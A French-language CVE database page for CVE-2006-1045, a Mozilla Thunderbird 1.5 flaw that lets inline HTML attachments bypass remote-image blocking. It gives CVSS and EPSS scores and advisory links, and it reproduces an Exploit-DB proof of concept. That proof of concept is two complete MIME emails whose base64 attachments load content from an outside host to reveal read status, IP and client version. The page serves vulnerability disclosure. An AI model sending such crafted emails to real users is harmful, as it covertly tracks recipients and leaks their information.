CVE-2006-1045 : Détail

CVE-2006-1045

2.96%V3
Network
2006-03-07 10:00 +00:00
2018-10-18 12:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

The HTML rendering engine in Mozilla Thunderbird 1.5, when "Block loading of remote images in mail messages" is enabled, does not properly block external images from inline HTML attachments, which could allow remote attackers to obtain sensitive information, such as application version or IP address, when the user reads the email and the external image is accessed.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 27337

Date de publication : 2006-02-27 23:00 +00:00
Auteur : Crashfr
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages. Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected. * Iframe Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<[email protected]> To: CrashFr<[email protected]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> </head><body style="margin: 0px; padding: 0px; border: 0px;"> <iframe src="cid:[email protected]" width="100%" height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/html; name="basic.html" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4 OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg== ------=_NextPart_000_0000_DE61E470.78F38016-- * CSS Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<[email protected]> To: CrashFr<[email protected]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> <link rel="stylesheet" type="text/css" href="cid:[email protected]" /></head><body> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/css; name="basic.css" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ== ------=_NextPart_000_0000_DE61E470.78F38016--

Products Mentioned

Configuraton 0

Mozilla>>Thunderbird >> Version 1.5

References

http://www.redhat.com/support/errata/RHSA-2006-0330.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/19902
Tags : third-party-advisory, x_refsource_SECUNIA
https://usn.ubuntu.com/276-1/
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/19941
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19821
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19823
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2006/dsa-1051
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.vupen.com/english/advisories/2006/3749
Tags : vdb-entry, x_refsource_VUPEN
http://www.gentoo.org/security/en/glsa/glsa-200604-18.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2006/1356
Tags : vdb-entry, x_refsource_VUPEN
http://securityreason.com/securityalert/514
Tags : third-party-advisory, x_refsource_SREASON
http://www.mandriva.com/security/advisories?name=MDKSA-2006:078
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/20051
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19863
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/16881
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/bid/17516
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/426347
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.gentoo.org/security/en/glsa/glsa-200605-09.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/22065
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/19950
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2006/dsa-1046
Tags : vendor-advisory, x_refsource_DEBIAN
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.